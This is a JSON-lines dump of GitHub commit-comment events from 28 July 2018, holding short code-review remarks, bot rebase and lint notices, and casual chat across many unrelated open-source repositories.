{"id":"8032913806","type":"CommitCommentEvent","actor":{"login":"almchung"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29870786,"position":34,"line":818,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-28T21:09:45Z","updated_at":"2018-07-28T21:09:45Z","author_association":"CONTRIBUTOR","body":"`value` instead of `color` should work."}},"created_at":"2018-07-28T21:09:45Z"}
{"id":"8032913952","type":"CommitCommentEvent","actor":{"login":"DrRobotto"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29870787,"position":null,"line":null,"path":null,"commit_id":"e1a8b81cbb2b4419df75221112f25c43dd14ab69","created_at":"2018-07-28T21:09:52Z","updated_at":"2018-07-28T21:09:52Z","author_association":"NONE","body":"Shouldn't the sha256 hash value be recalculated?"}},"created_at":"2018-07-28T21:09:52Z"}
{"id":"8032914396","type":"CommitCommentEvent","actor":{"login":"almchung"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29870788,"position":17,"line":801,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-28T21:10:15Z","updated_at":"2018-07-28T21:10:15Z","author_association":"CONTRIBUTOR","body":"`this.value()` instead of `this.color()`"}},"created_at":"2018-07-28T21:10:15Z"}
{"id":"8032914555","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"mintunitish/material-components-boilerplate"},"payload":{"comment":{"id":29870789,"position":null,"line":null,"path":null,"commit_id":"c16b8d75f744102a80e38b5d3fe708e311759118","created_at":"2018-07-28T21:10:23Z","updated_at":"2018-07-28T21:10:23Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #1 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T21:10:23Z"}
{"id":"8032915202","type":"CommitCommentEvent","actor":{"login":"bennygenel"},"repo":{"name":"AWolf81/guppy"},"payload":{"comment":{"id":29870791,"position":4,"line":23,"path":"src/middlewares/task.middleware.js","commit_id":"765fc31825f9d740972945a741ef0332c71a8858","created_at":"2018-07-28T21:10:54Z","updated_at":"2018-07-28T21:10:54Z","author_association":"NONE","body":"Rather than importing here maybe we can move this to `platform.services` and not send the argument to `formatCommandForPlatform`"}},"created_at":"2018-07-28T21:10:54Z"}
{"id":"8032915685","type":"CommitCommentEvent","actor":{"login":"JosephP91"},"repo":{"name":"JosephP91/curlcpp"},"payload":{"comment":{"id":29870792,"position":null,"line":null,"path":null,"commit_id":"719034833c9fb025401b16aec4425291479e2da6","created_at":"2018-07-28T21:11:17Z","updated_at":"2018-07-28T21:11:17Z","author_association":"OWNER","body":"Fixes #118 "}},"created_at":"2018-07-28T21:11:17Z"}
{"id":"8032915743","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"mintunitish/material-components-boilerplate"},"payload":{"comment":{"id":29870793,"position":null,"line":null,"path":null,"commit_id":"d828934cf259a630f46bca9e42b135b385abff41","created_at":"2018-07-28T21:11:21Z","updated_at":"2018-07-28T21:11:21Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #2 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-28T21:11:21Z"}
{"id":"8032917686","type":"CommitCommentEvent","actor":{"login":"fbaierl"},"repo":{"name":"fbaierl/bundeszirkus-server"},"payload":{"comment":{"id":29870801,"position":4,"line":24,"path":"package.json","commit_id":"ac52db47cd54c3cb0c328bb4873697fb66da948d","created_at":"2018-07-28T21:13:00Z","updated_at":"2018-07-28T21:13:00Z","author_association":"OWNER","body":"Can be removed again!"}},"created_at":"2018-07-28T21:13:00Z"}
{"id":"8032917917","type":"CommitCommentEvent","actor":{"login":"fbaierl"},"repo":{"name":"fbaierl/bundeszirkus-server"},"payload":{"comment":{"id":29870803,"position":7,"line":27,"path":"package.json","commit_id":"ac52db47cd54c3cb0c328bb4873697fb66da948d","created_at":"2018-07-28T21:13:12Z","updated_at":"2018-07-28T21:13:12Z","author_association":"OWNER","body":"Can be removed again!"}},"created_at":"2018-07-28T21:13:12Z"}
{"id":"8032919723","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":29870808,"position":52,"line":951,"path":"autoload/neomake.vim","commit_id":"3d89088f70699947f5b091face520136d269bfff","created_at":"2018-07-28T21:14:46Z","updated_at":"2018-07-28T21:14:46Z","author_association":"MEMBER","body":"I think the condition is wrong / could be better, because also with `g:neomake_open_list_resize_existing = 0` you might want to delay opening it (so that it gets the size correct more likely when opening it)?!"}},"created_at":"2018-07-28T21:14:46Z"}
{"id":"8032919915","type":"CommitCommentEvent","actor":{"login":"AnonymousHybi"},"repo":{"name":"Docosahexaenoic-Acid/Chompstation-Baystation"},"payload":{"comment":{"id":29870809,"position":21,"line":34,"path":"code/modules/organs/standard_vr.dm","commit_id":"d9155c4c0ab67578a6d7364a08f0866ff3b7519d","created_at":"2018-07-28T21:14:56Z","updated_at":"2018-07-28T21:14:56Z","author_association":"NONE","body":"There is some list somewhere, it's just named differently."}},"created_at":"2018-07-28T21:14:56Z"}
{"id":"8032920497","type":"CommitCommentEvent","actor":{"login":"AnonymousHybi"},"repo":{"name":"Docosahexaenoic-Acid/Chompstation-Baystation"},"payload":{"comment":{"id":29870814,"position":5,"line":35,"path":"code/modules/vore/eating/belly_dat_vr.dm","commit_id":"d9155c4c0ab67578a6d7364a08f0866ff3b7519d","created_at":"2018-07-28T21:15:23Z","updated_at":"2018-07-28T21:15:23Z","author_association":"NONE","body":"Should make it mob/living so that living mobs can have stomachs too"}},"created_at":"2018-07-28T21:15:23Z"}
{"id":"8032920678","type":"CommitCommentEvent","actor":{"login":"AnonymousHybi"},"repo":{"name":"Docosahexaenoic-Acid/Chompstation-Baystation"},"payload":{"comment":{"id":29870815,"position":5,"line":49,"path":"code/modules/vore/eating/belly_obj_vr.dm","commit_id":"d9155c4c0ab67578a6d7364a08f0866ff3b7519d","created_at":"2018-07-28T21:15:33Z","updated_at":"2018-07-28T21:15:33Z","author_association":"NONE","body":"Should make it mob/living so that living mobs can have stomachs too\r\n\r\n"}},"created_at":"2018-07-28T21:15:33Z"}
{"id":"8032920842","type":"CommitCommentEvent","actor":{"login":"Jocelynch"},"repo":{"name":"magicbruno/FileBrowser"},"payload":{"comment":{"id":29870817,"position":null,"line":null,"path":null,"commit_id":"01738c189bc36a70b3c8efd9195ad9f9a7f0bc65","created_at":"2018-07-28T21:15:42Z","updated_at":"2018-07-28T21:15:42Z","author_association":"NONE","body":"hello magicbruno,\r\n\r\nI want to know how to get file path,when click file on FileBrowser page in javascript code.\r\n\r\nThanks!\r\n"}},"created_at":"2018-07-28T21:15:42Z"}
{"id":"8032922163","type":"CommitCommentEvent","actor":{"login":"AnonymousHybi"},"repo":{"name":"Docosahexaenoic-Acid/Chompstation-Baystation"},"payload":{"comment":{"id":29870824,"position":16,"line":227,"path":"code/modules/vore/eating/belly_obj_vr.dm","commit_id":"d9155c4c0ab67578a6d7364a08f0866ff3b7519d","created_at":"2018-07-28T21:16:52Z","updated_at":"2018-07-28T21:16:52Z","author_association":"NONE","body":"Do a control F of: \r\n> /drop_location()\r\nYou'll find the definition, and you can paste that in. :)"}},"created_at":"2018-07-28T21:16:52Z"}
{"id":"8032924593","type":"CommitCommentEvent","actor":{"login":"sashaba"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29870830,"position":null,"line":null,"path":null,"commit_id":"0d43751cabad7270d5f773005b3b20d17e078b62","created_at":"2018-07-28T21:19:01Z","updated_at":"2018-07-28T21:19:01Z","author_association":"NONE","body":"Code push  5.4.0 and gradle 3.1.3, i'm going to try #1219.\r\nThank you."}},"created_at":"2018-07-28T21:19:01Z"}
{"id":"8032927094","type":"CommitCommentEvent","actor":{"login":"onur-yildiz"},"repo":{"name":"onur-yildiz/node-tutorial-todo-api"},"payload":{"comment":{"id":29870836,"position":null,"line":null,"path":null,"commit_id":"c53d1056624cd9e9986f73f93d8e3080ae9ab08c","created_at":"2018-07-28T21:21:22Z","updated_at":"2018-07-28T21:21:22Z","author_association":"OWNER","body":"Correction: /users/me/token"}},"created_at":"2018-07-28T21:21:22Z"}
{"id":"8032927144","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29870837,"position":null,"line":null,"path":null,"commit_id":"07b3b10b1f9dd77ea50e087e874022ac81aa3cfd","created_at":"2018-07-28T21:21:26Z","updated_at":"2018-07-28T21:21:26Z","author_association":"COLLABORATOR","body":"That AARDV is full of Ore and weighs 30 tons. Cleanly flys to a 250x250 orbit. The single J-2 is the silly bit.\r\n\r\n![screenshot6](https://user-images.githubusercontent.com/16825376/43360731-5c52354c-928a-11e8-9340-626a81ce7f7c.png)\r\n"}},"created_at":"2018-07-28T21:21:26Z"}
{"id":"8032927870","type":"CommitCommentEvent","actor":{"login":"pieper"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29870843,"position":25,"line":52,"path":"Modules/Loadable/Markups/MRML/vtkMRMLMarkupsFiducialStorageNode.cxx","commit_id":"7df26d7925faea88fc1b302082d6c186ffdbe458","created_at":"2018-07-28T21:22:03Z","updated_at":"2018-07-28T21:22:03Z","author_association":"MEMBER","body":"There were a couple other things to sort out but the build works now (as of 27309).\r\n\r\nLet's get 4.10 released so we can drop all the backwards compatibility stuff."}},"created_at":"2018-07-28T21:22:03Z"}
{"id":"8032936279","type":"CommitCommentEvent","actor":{"login":"joslinchan"},"repo":{"name":"luCastro/TechTrawl"},"payload":{"comment":{"id":29870874,"position":null,"line":null,"path":null,"commit_id":"e0b5fe2ea9d0ac0a96728aaa06ee7889e6573c5d","created_at":"2018-07-28T21:29:32Z","updated_at":"2018-07-28T21:29:32Z","author_association":"COLLABORATOR","body":"This commit connects the services/event_retriever.rb to the index action in events controller. Now able to display calendar, and retrieve data from meetup.com as json array."}},"created_at":"2018-07-28T21:29:32Z"}
{"id":"8032936395","type":"CommitCommentEvent","actor":{"login":"jakeos"},"repo":{"name":"jakeos/jakeoneil.com"},"payload":{"comment":{"id":29870875,"position":null,"line":null,"path":null,"commit_id":"ae46a6c557de3348a7a2ef8eb8f0b32369a4a7dd","created_at":"2018-07-28T21:29:39Z","updated_at":"2018-07-28T21:29:39Z","author_association":"OWNER","body":"Just dropping this here so I can stop paying for hosting and get the domain hosted on GitHub Pages"}},"created_at":"2018-07-28T21:29:39Z"}
{"id":"8032937165","type":"CommitCommentEvent","actor":{"login":"TanviKumar"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29870877,"position":34,"line":818,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-28T21:30:14Z","updated_at":"2018-07-28T21:30:14Z","author_association":"MEMBER","body":"This is to add a method to the colorPicker object itself, one that returns a p5.Color object as previously decided in the issue."}},"created_at":"2018-07-28T21:30:14Z"}
{"id":"8032938571","type":"CommitCommentEvent","actor":{"login":"Kiyira"},"repo":{"name":"CoryAndrewHofstad/DEFENSIVE-MECHANISMS-FOR-ORBITAL-SATELLITES"},"payload":{"comment":{"id":29870881,"position":null,"line":null,"path":null,"commit_id":"917e7d2d70a14d5fc4eca68d208f39a6285d902d","created_at":"2018-07-28T21:31:24Z","updated_at":"2018-07-28T21:31:24Z","author_association":"NONE","body":"It's amazing to me how (ostensibly) unprotected the space station is."}},"created_at":"2018-07-28T21:31:24Z"}
{"id":"8032940051","type":"CommitCommentEvent","actor":{"login":"somya77"},"repo":{"name":"somya77/Addition"},"payload":{"comment":{"id":29870890,"position":null,"line":null,"path":null,"commit_id":"ce75dbf73f3f477164bee2e8bed19125b459cfa8","created_at":"2018-07-28T21:32:44Z","updated_at":"2018-07-28T21:32:44Z","author_association":"OWNER","body":"Addition of two numbers"}},"created_at":"2018-07-28T21:32:44Z"}
{"id":"8032944351","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29870903,"position":39,"line":31,"path":"part3/5-date_number.rb","commit_id":"a75fd1125102532dfe1b72e37fc9a95455104680","created_at":"2018-07-28T21:36:03Z","updated_at":"2018-07-28T21:36:03Z","author_association":"NONE","body":"Или, например ``` days_in_month.first(month - 1).sum(day)```"}},"created_at":"2018-07-28T21:36:03Z"}
{"id":"8032945109","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29870904,"position":36,"line":29,"path":"part3/6-shopping_cart.rb","commit_id":"a75fd1125102532dfe1b72e37fc9a95455104680","created_at":"2018-07-28T21:36:39Z","updated_at":"2018-07-28T21:36:39Z","author_association":"NONE","body":"Индентацию внутри блока хорошо бы поправить"}},"created_at":"2018-07-28T21:36:39Z"}
{"id":"8032947132","type":"CommitCommentEvent","actor":{"login":"12345698752"},"repo":{"name":"12345698752/trabajo-html"},"payload":{"comment":{"id":29870919,"position":null,"line":null,"path":null,"commit_id":"36dfed2d17adc1ab3409fdb9ae2afcc56783db7d","created_at":"2018-07-28T21:38:23Z","updated_at":"2018-07-28T21:38:23Z","author_association":"OWNER","body":"[113P2KARENPEÑA.txt](https://github.com/12345698752/trabajo-html/files/2238310/113P2KARENPENA.txt)\r\n"}},"created_at":"2018-07-28T21:38:23Z"}
{"id":"8032948006","type":"CommitCommentEvent","actor":{"login":"12345698752"},"repo":{"name":"12345698752/trabajo-html"},"payload":{"comment":{"id":29870924,"position":1,"line":1,"path":"README.md","commit_id":"36dfed2d17adc1ab3409fdb9ae2afcc56783db7d","created_at":"2018-07-28T21:39:14Z","updated_at":"2018-07-28T21:39:14Z","author_association":"OWNER","body":"[113P2KARENPEÑA.txt](https://github.com/12345698752/trabajo-html/files/2238311/113P2KARENPENA.txt)\r\n\r\n"}},"created_at":"2018-07-28T21:39:14Z"}
{"id":"8032948847","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29870927,"position":null,"line":null,"path":null,"commit_id":"de83e78219c1a31d5962382928f9862924c2d20a","created_at":"2018-07-28T21:40:00Z","updated_at":"2018-07-28T21:40:00Z","author_association":"CONTRIBUTOR","body":"Il faut synchroniser le changement avec \r\nDefInjected/RecipeDef/ImpliedDefs.xml:  <Make_Apparel_PowerArmor.label>fabriquer une armure intégrale</Make_Apparel_PowerArmor.label>\r\nDefInjected/RecipeDef/ImpliedDefs.xml:  <Make_Apparel_PowerArmor.description>Fabriquer une armure intégrale.</Make_Apparel_PowerArmor.description>\r\nDefInjected/RecipeDef/ImpliedDefs.xml:  <Make_Apparel_PowerArmor.jobString>Fabrique une armure intégrale.</Make_Apparel_PowerArmor.jobString>\r\nDefInjected/RecipeDef/ImpliedDefs.xml:  <Make_Apparel_PowerArmorHelmet.label>fabriquer un casque d'armure intégrale</Make_Apparel_PowerArmorHelmet.label>\r\nDefInjected/RecipeDef/ImpliedDefs.xml:  <Make_Apparel_PowerArmorHelmet.description>Fabriquer un casque d'armure intégrale.</Make_Apparel_PowerArmorHelmet.description>\r\nDefInjected/RecipeDef/ImpliedDefs.xml:  <Make_Apparel_PowerArmorHelmet.jobString>Fabrique un casque d'armure intégrale.</Make_Apparel_PowerArmorHelmet.jobString>\r\nDefInjected/ThingDef/Apparel_Headgear.xml:  <Apparel_PowerArmorHelmet.label>casque d'armure intégrale</Apparel_PowerArmorHelmet.label>\r\nDefInjected/ThingDef/Apparel_Headgear.xml:  <Apparel_PowerArmorHelmet.description>Partie supérieure d'une armure intégrale, utilisée principalement par l'infanterie lourde.</Apparel_PowerArmorHelmet.description>\r\n"}},"created_at":"2018-07-28T21:40:00Z"}
{"id":"8032951749","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"fly49/imdb_classes"},"payload":{"comment":{"id":29870935,"position":14,"line":10,"path":"lib/theatre.rb","commit_id":"1e3c378e48fdffe900e04730dfd5fcec9c0d82f4","created_at":"2018-07-28T21:42:20Z","updated_at":"2018-07-28T21:42:20Z","author_association":"NONE","body":"Это более идиоматично сказать так: `unless SCHEDULE.key?(time)`"}},"created_at":"2018-07-28T21:42:20Z"}
{"id":"8032953765","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29870944,"position":null,"line":null,"path":null,"commit_id":"dd772b7723500ca361e41fe82467659ba55a396a","created_at":"2018-07-28T21:44:08Z","updated_at":"2018-07-28T21:44:08Z","author_association":"COLLABORATOR","body":"I applaud the amount of analysis work implied by this commit and the other ones related to world loot.\r\nAnd the patience for compiling and writing down all of this. \r\n\r\nThere are some work to port it to Classic, but the global structure is quite clear.\r\n\r\nI think in the future, it would be nice to move to core all the logic of table picking based on creature level  instead of having it hardcoded in the DB. This would greatly reduce redundancy in `creature_loot_template` table. \r\n\r\nAnyway, great job!\r\n"}},"created_at":"2018-07-28T21:44:08Z"}
{"id":"8032957429","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29870953,"position":null,"line":null,"path":null,"commit_id":"dd772b7723500ca361e41fe82467659ba55a396a","created_at":"2018-07-28T21:47:08Z","updated_at":"2018-07-28T21:47:08Z","author_association":"COLLABORATOR","body":"@cala there is one \"bug\" in place with this implementation for now. Lets say you have creature which has MinLevel 29 and MaxLevel 30, when spawned as 29, world loot should be 20-29, when spawned as 30, it should be 30-39. This is currently not possible, but considering its such a minor nuisance, its better than nothing. Max level content is not impacted."}},"created_at":"2018-07-28T21:47:08Z"}
{"id":"8032957737","type":"CommitCommentEvent","actor":{"login":"KevinHock"},"repo":{"name":"python-security/pyt"},"payload":{"comment":{"id":29870954,"position":null,"line":null,"path":null,"commit_id":"66f486c5a60c2580c88b1a94c9fa4fec1a0c6c92","created_at":"2018-07-28T21:47:24Z","updated_at":"2018-07-28T21:47:24Z","author_association":"COLLABORATOR","body":"LGTY @bcaller? 😀 "}},"created_at":"2018-07-28T21:47:24Z"}
{"id":"8032958395","type":"CommitCommentEvent","actor":{"login":"AgnesMunyoro"},"repo":{"name":"JonMinton/agnes_research"},"payload":{"comment":{"id":29870956,"position":null,"line":null,"path":null,"commit_id":"64792983c4f149f98fba3c94a52dd210fd1ed24b","created_at":"2018-07-28T21:48:00Z","updated_at":"2018-07-28T21:48:00Z","author_association":"NONE","body":"[Hypotheses and Methods Final edit before sending it to Jon.docx](https://github.com/JonMinton/agnes_research/files/2238316/Hypotheses.and.Methods.Final.edit.before.sending.it.to.Jon.docx)\r\n"}},"created_at":"2018-07-28T21:48:00Z"}
{"id":"8032958749","type":"CommitCommentEvent","actor":{"login":"Fr1tzl1"},"repo":{"name":"greven/oUF_Lumen"},"payload":{"comment":{"id":29870960,"position":null,"line":null,"path":null,"commit_id":"04d202b0495d17272327179f643e3e5d816e252f","created_at":"2018-07-28T21:48:20Z","updated_at":"2018-07-28T21:48:20Z","author_association":"NONE","body":"How can i disable the Visibility options, that the player units are always visible\r\n\r\nvisibility = \"...........\" "}},"created_at":"2018-07-28T21:48:20Z"}
{"id":"8032958833","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29870964,"position":null,"line":null,"path":null,"commit_id":"dd772b7723500ca361e41fe82467659ba55a396a","created_at":"2018-07-28T21:48:23Z","updated_at":"2018-07-28T21:48:23Z","author_association":"COLLABORATOR","body":"Also this: https://github.com/cmangos/tbc-db/commit/106915097925b9527069bd659dd340cdfc9b3d76"}},"created_at":"2018-07-28T21:48:23Z"}
{"id":"8032961736","type":"CommitCommentEvent","actor":{"login":"vezza"},"repo":{"name":"FGMEMBERS/IDG-A33X"},"payload":{"comment":{"id":29870971,"position":null,"line":null,"path":null,"commit_id":"97d7bbe0f78523c5ddcd7d694a278b326905157c","created_at":"2018-07-28T21:50:59Z","updated_at":"2018-07-28T21:50:59Z","author_association":"CONTRIBUTOR","body":"sorry git is quite hostile to me..."}},"created_at":"2018-07-28T21:50:59Z"}
{"id":"8032964096","type":"CommitCommentEvent","actor":{"login":"srinivasg77"},"repo":{"name":"srinivasg77/sampleProtractor"},"payload":{"comment":{"id":29870974,"position":null,"line":null,"path":null,"commit_id":"5668a400aa93aa835a99d985c0be02f6c6d24c8b","created_at":"2018-07-28T21:52:52Z","updated_at":"2018-07-28T21:52:52Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-28T21:52:52Z"}
{"id":"8032967786","type":"CommitCommentEvent","actor":{"login":"phanigithub"},"repo":{"name":"phanigithub/Selenium_NoFramework"},"payload":{"comment":{"id":29870990,"position":null,"line":null,"path":null,"commit_id":"c84e7775f9d11118fe5ed79b86276ac7ea495d73","created_at":"2018-07-28T21:56:08Z","updated_at":"2018-07-28T21:56:08Z","author_association":"OWNER","body":"What is this Change"}},"created_at":"2018-07-28T21:56:08Z"}
{"id":"8032967911","type":"CommitCommentEvent","actor":{"login":"phanigithub"},"repo":{"name":"phanigithub/Selenium_NoFramework"},"payload":{"comment":{"id":29870991,"position":null,"line":null,"path":null,"commit_id":"c84e7775f9d11118fe5ed79b86276ac7ea495d73","created_at":"2018-07-28T21:56:14Z","updated_at":"2018-07-28T21:56:14Z","author_association":"OWNER","body":"Nothing"}},"created_at":"2018-07-28T21:56:14Z"}
{"id":"8032969692","type":"CommitCommentEvent","actor":{"login":"tmoore2016"},"repo":{"name":"tmoore2016/interpreter"},"payload":{"comment":{"id":29870995,"position":null,"line":null,"path":null,"commit_id":"2011b05eebb65d15efb73415875b70e166b166d1","created_at":"2018-07-28T21:57:48Z","updated_at":"2018-07-28T21:57:48Z","author_association":"OWNER","body":"Adding doorkey.go"}},"created_at":"2018-07-28T21:57:48Z"}
{"id":"8032974169","type":"CommitCommentEvent","actor":{"login":"xdamman"},"repo":{"name":"opencollective/eslint-config-opencollective"},"payload":{"comment":{"id":29871017,"position":99,"line":77,"path":"index.js","commit_id":"35c2389edcd6fd12f6b7b560d0974e8fa70c4ce4","created_at":"2018-07-28T22:01:04Z","updated_at":"2018-07-28T22:01:04Z","author_association":"CONTRIBUTOR","body":"this one is also very annoying and I'd argue unnecessary. "}},"created_at":"2018-07-28T22:01:04Z"}
{"id":"8032975104","type":"CommitCommentEvent","actor":{"login":"jonkatz6"},"repo":{"name":"chrisknepper/android-messages-desktop"},"payload":{"comment":{"id":29871018,"position":null,"line":null,"path":null,"commit_id":"ff29bfb0906d1cadd4c89c4a3a63038df015f571","created_at":"2018-07-28T22:01:39Z","updated_at":"2018-07-28T22:01:39Z","author_association":"NONE","body":"How do you make the Menu re-appear after turning on \"auto hide menu bar\"? I turned on the feature but was unable to make it re-appear. I had to uninstall and delete all leftover files, then reinstall to get the menu bar back. If there is a shortcut please let me know."}},"created_at":"2018-07-28T22:01:39Z"}
{"id":"8032975855","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"steinbaugh/basejump"},"payload":{"comment":{"id":29871019,"position":null,"line":null,"path":null,"commit_id":"9862fee66f8aaea75d2d8cc13dc88fdac0a25f76","created_at":"2018-07-28T22:02:12Z","updated_at":"2018-07-28T22:02:12Z","author_association":"NONE","body":"[R/sampleData-methods.R:43:1:](https://github.com/steinbaugh/basejump/blob/9862fee66f8aaea75d2d8cc13dc88fdac0a25f76/R/sampleData-methods.R#L43) *style:* **Lines should not be more than 80 characters.**\n```r\n​        # Legacy arguments =========================================================\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T22:02:12Z"}
{"id":"8032976011","type":"CommitCommentEvent","actor":{"login":"greven"},"repo":{"name":"greven/oUF_Lumen"},"payload":{"comment":{"id":29871020,"position":null,"line":null,"path":null,"commit_id":"04d202b0495d17272327179f643e3e5d816e252f","created_at":"2018-07-28T22:02:20Z","updated_at":"2018-07-28T22:02:20Z","author_association":"OWNER","body":"visibility = show\r\n\r\nI'll add that as a comment in the config in the future. :)"}},"created_at":"2018-07-28T22:02:20Z"}
{"id":"8032976575","type":"CommitCommentEvent","actor":{"login":"ojwb"},"repo":{"name":"xapian/xapian"},"payload":{"comment":{"id":29871022,"position":null,"line":null,"path":null,"commit_id":"3d1771612c97823d14adf4a3579e7942e7c839fb","created_at":"2018-07-28T22:02:46Z","updated_at":"2018-07-28T22:02:46Z","author_association":"CONTRIBUTOR","body":"1.4.7 was released a week and a half ago, so it's really a bit late to be requesting what to include in it.\r\n\r\nHowever, you're lucky and I have a time machine: 9791b005fd73c5169bf7f1f862f40b55e1f69e41"}},"created_at":"2018-07-28T22:02:46Z"}
{"id":"8032977415","type":"CommitCommentEvent","actor":{"login":"sean7218"},"repo":{"name":"sean7218/UberEATS"},"payload":{"comment":{"id":29871026,"position":null,"line":null,"path":null,"commit_id":"23190ebb4f93b630f606e18dfce977e0e93478fe","created_at":"2018-07-28T22:03:25Z","updated_at":"2018-07-28T22:03:25Z","author_association":"OWNER","body":"`UberEATS/model/Meal.swift`\r\nAll the data is collected from the app for Tennessee Taco Company in Memphis, TN"}},"created_at":"2018-07-28T22:03:25Z"}
{"id":"8032978243","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871030,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:04:12Z","updated_at":"2018-07-28T22:04:12Z","author_association":"NONE","body":"verdammt"}},"created_at":"2018-07-28T22:04:12Z"}
{"id":"8032978625","type":"CommitCommentEvent","actor":{"login":"xdamman"},"repo":{"name":"opencollective/eslint-config-opencollective"},"payload":{"comment":{"id":29871032,"position":99,"line":77,"path":"index.js","commit_id":"35c2389edcd6fd12f6b7b560d0974e8fa70c4ce4","created_at":"2018-07-28T22:04:34Z","updated_at":"2018-07-28T22:04:34Z","author_association":"CONTRIBUTOR","body":"E.g.\r\n```js\r\nexport const addCollectiveCoverData = graphql(getCollectiveCoverQuery, {\r\n  options(props) {\r\n    return {\r\n      variables: {\r\n        slug: props.collectiveSlug || props.slug\r\n      }\r\n    }\r\n  }\r\n});\r\n```\r\n\r\nvs\r\n\r\n```js\r\nexport const addCollectiveCoverData = graphql(getCollectiveCoverQuery, {\r\n  options(props) {\r\n    return {\r\n      variables: {\r\n        slug: props.collectiveSlug || props.slug\r\n      },\r\n    },\r\n  },\r\n});\r\n```"}},"created_at":"2018-07-28T22:04:34Z"}
{"id":"8032978933","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871040,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:04:52Z","updated_at":"2018-07-28T22:04:52Z","author_association":"CONTRIBUTOR","body":"hi leo"}},"created_at":"2018-07-28T22:04:52Z"}
{"id":"8032978986","type":"CommitCommentEvent","actor":{"login":"Fr1tzl1"},"repo":{"name":"greven/oUF_Lumen"},"payload":{"comment":{"id":29871041,"position":null,"line":null,"path":null,"commit_id":"04d202b0495d17272327179f643e3e5d816e252f","created_at":"2018-07-28T22:04:55Z","updated_at":"2018-07-28T22:04:55Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-28T22:04:55Z"}
{"id":"8032979107","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871042,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:05:01Z","updated_at":"2018-07-28T22:05:01Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-28T22:05:01Z"}
{"id":"8032979277","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871043,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:05:10Z","updated_at":"2018-07-28T22:05:10Z","author_association":"NONE","body":"hi jerrynicki hi roesch"}},"created_at":"2018-07-28T22:05:10Z"}
{"id":"8032979650","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871044,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:05:31Z","updated_at":"2018-07-28T22:05:31Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/8181990/43360953-1a89f7ec-92c3-11e8-9443-2c94eb14a365.png)\r\n"}},"created_at":"2018-07-28T22:05:31Z"}
{"id":"8032979782","type":"CommitCommentEvent","actor":{"login":"Jerrynicki"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29871045,"position":null,"line":null,"path":null,"commit_id":"804c5172a293b131651f32d9016e54db08884409","created_at":"2018-07-28T22:05:37Z","updated_at":"2018-07-28T22:05:37Z","author_association":"CONTRIBUTOR","body":"mein benis auf einmal groß was tun"}},"created_at":"2018-07-28T22:05:37Z"}
